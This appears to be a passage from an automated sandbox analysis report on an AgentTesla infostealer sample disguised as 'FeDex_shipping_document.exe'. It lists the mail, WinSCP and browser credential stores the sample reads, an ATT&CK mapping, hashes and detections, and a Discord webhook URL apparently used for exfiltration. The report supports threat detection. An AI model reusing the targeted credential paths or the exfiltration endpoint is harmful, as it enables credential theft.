        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: Yara matchFile source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation        		Path Interception111
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		11
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools        		21
        Input Capture        		131
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol21
        Input Capture        		Exfiltration Over Bluetooth1
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
        Virtualization/Sandbox Evasion        		1
        Credentials in Registry        		1
        Application Window Discovery        		SMB/Windows Admin Shares1
        Archive Collected Data        		Automated Exfiltration3
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
        Process Injection        		NTDS1
        Remote System Discovery        		Distributed Component Object Model1
        Data from Local System        		Scheduled Transfer14
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA Secrets1
        System Network Configuration Discovery        		SSH1
        Clipboard Data        		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common2
        Software Packing        		Cached Domain Credentials114
        System Information Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        FeDex_shipping_document.exe38%ReversingLabsWin32.Trojan.Generic
        FeDex_shipping_document.exe34%VirustotalBrowse
        FeDex_shipping_document.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        1.2.FeDex_shipping_document.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

        Domains

        SourceDetectionScannerLabelLink
        discord.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://discord.com0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        https://discord.com40%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        https://discord.comD80%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        discord.com
        		162.159.138.232
        		truetrueunknown
        api4.ipify.org
        		64.185.227.155
        		truefalse
          		high
          api.ipify.org
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://api.ipify.org/false
              		high
              https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYjtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://discord.comFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://discord.comFeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://discord.comD8FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.goodfont.co.krFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/cabarga.htmlNFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ipify.orgFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://fontfabrik.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://discord.com4FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.159.138.232
                                              		discord.comUnited States
                                              		13335CLOUDFLARENETUStrue
                                              64.185.227.155
                                              		api4.ipify.orgUnited States
                                              		18450WEBNXUSfalse
                                              162.159.135.232
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              General Information

                                              Joe Sandbox Version:37.0.0 Beryl
                                              Analysis ID:830454
                                              Start date and time:2023-03-20 11:50:40 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:FeDex_shipping_document.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@4/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.10.249.147, 23.10.249.178, 93.184.221.240, 8.238.85.126, 8.241.126.121, 8.248.137.254, 67.26.75.254, 8.238.88.254
                                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:51:45API Interceptor683x Sleep call for process: FeDex_shipping_document.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FeDex_shipping_document.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.355304211458859
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                              C:\Users\user\AppData\Roaming\ghkgpqzj.zir\Chrome\Default\Network\Cookies

                                              Download File
                                              Process:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                              Category:dropped
                                              Size (bytes):28672
                                              Entropy (8bit):0.4393511334109407
                                              Encrypted:false
                                              SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                              MD5:8C31C5487A97BBE73711C5E20600C1F6
                                              SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                              SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                              SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.864054907684923
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:FeDex_shipping_document.exe
                                              File size:746496
                                              MD5:5cf87a160007a5e6c7a4d24e1d831327
                                              SHA1:e11d7467bc961d5ff16c3541200be1ad5083cefa
                                              SHA256:91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
                                              SHA512:c11e2c571817ac519ef89019529171d64e9f3faa17a2ccd51a55770113eff83e27f3a53133cec3daa096f989fafedd378e759cc4030b83489ebccbd7aa425237
                                              SSDEEP:12288:EDBmYMUnFW/NMbbjHAaBvaDzGkSjT+vbuxiZQ7GiPLbk6jdoVx2ye6yb:EDBUibAXPGD+zKiri/kCGVYye6q
                                              TLSH:66F402342FEA6239F57657BDD9E43295236E77B22703D95E04B121CA4B63B028DC092F
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0..N..........Rm... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:209480e66eb84902

                                              Static PE Info

                                              General

                                              Entrypoint:0x4b6d52
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6417BCAC [Mon Mar 20 01:53:48 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

